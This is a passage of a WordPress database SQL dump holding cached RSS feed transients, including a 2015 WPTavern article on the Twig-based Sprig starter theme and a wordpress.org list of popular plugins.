+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: Sprig: A WordPress Starter Theme that Features the Twig Templating Engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37053\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/sprig-a-wordpress-starter-theme-that-features-the-twig-templating-engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4167:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png\" rel=\"prettyphoto[37053]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png?resize=857%2C390\" alt=\"sprig\" class=\"aligncenter size-full wp-image-38303\" /></a></p>\n<p>Those who are new to WordPress theming are often confused by the mixture of PHP and HTML markup in templates. It’s easy to accidentally break theme functionality when everything is placed in the same file.</p>\n<p>For that reason, there’s a strong contingency of developers who prefer to integrate the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine with WordPress, using a starter theme or via plugins like <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, or the like. Fans of Twig appreciate its concise syntax and find that it makes templates more readable.</p>\n<p><a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> is a new Twig-based starter theme for WordPress created by developer <a href=\"http://zach-adams.com/\" target=\"_blank\">Zach Adams</a>. The theme incorporates the power and flexibility of Twig templating to speed up development and make WordPress templates easier to edit.</p>\n<p>Here’s an example of what the WordPress loop looks like in Sprig:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">{% for post in posts() %}\n {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>For those who have never worked with a templating engine, the syntax may look rather unfamiliar, but the advantage is that it allows you to separate the necessities of getting/manipulating your data and rendering it out. Below is an example of the WordPress loop with arguments:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\n{% for post in posts({\n \'post_type\':\'post\',\n \'posts_per_page\':4\n}) %}\n {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p> </p>\n<h5>Sprig Features</h5>\n<p>Sprig utilizes Bower for frontend package management. It comes pre-loaded with either <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">Bootstrap</a> or <a href=\"https://github.com/zach-adams/sprig-foundation\" target=\"_blank\">Foundation</a> to get started. Sprig uses <a href=\"http://gulpjs.com/\" target=\"_blank\">Gulp</a> to automate tasks such as compiling, concatenating, and minifying CSS and Javascript.</p>\n<p>The theme was developed using the best parts of <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a>, <a href=\"http://roots.io/starter-theme/\" target=\"_blank\">Roots</a>, and <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, which bring in a number of additional functions and scripts useful for theme development.</p>\n<h3>Does Twig Introduce a New Layer of Abstraction?</h3>\n<p>The main argument some theme developers have against using a templating engine like Twig is that it introduces a new layer of abstraction, as well as another thing to learn on top of WordPress’ usual way of structuring template files. Some believe that the <a href=\"http://en.wikipedia.org/wiki/Separation_of_concerns\" target=\"_blank\">separation of concerns</a> prohibits a theme developer from gaining a true understanding of how WordPress works.</p>\n<p>Adams clearly states that the purpose of Sprig is to help theme developers spend less time wading through template markup code and instead focus their efforts on creating beautiful themes. The Twig templating engine may not be your cup of tea, but many developers find that it helps them produce cleaner template code that is easier to reuse.</p>\n<p>If <a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> helps get you from here to there faster, then it might be worth incorporating into your theme development workflow. Check out the full <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">documentation on GitHub</a>. The project is still under active development and Adams recommends you test Sprig heavily before using it in production.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 20:31:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 16 Feb 2015 21:07:45 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"242380\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Mon, 16 Feb 2015 21:00:15 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20150216205945\";}','no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`)
VALUES
(113,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1424164065','no'),
(114,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1424120865','no'),
(115,'_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109','1424164065','no'),
(116,'_transient_feed_b9388c83948825c1edaef0d856b7b109','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Feb 2015 21:01:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"23862@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Your WordPress, Streamlined.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2141@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WooCommerce - excelling eCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29860@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"15@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Google Analytics by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2316@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"Track your WordPress site easily with the latest tracking codes and lots added data for search result pages and error pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"753@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8321@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast's WordPress SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Google Analytics Dashboard for WP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/plugins/google-analytics-dashboard-for-wp/#post-50539\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 10 Mar 2013 17:07:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"50539@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Displays Google Analytics reports and real-time statistics in your WordPress Dashboard. Inserts the latest tracking code in every page of your site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alin Marcu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"18101@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Page Builder by SiteOrigin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/siteorigin-panels/#post-51888\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Apr 2013 10:36:42 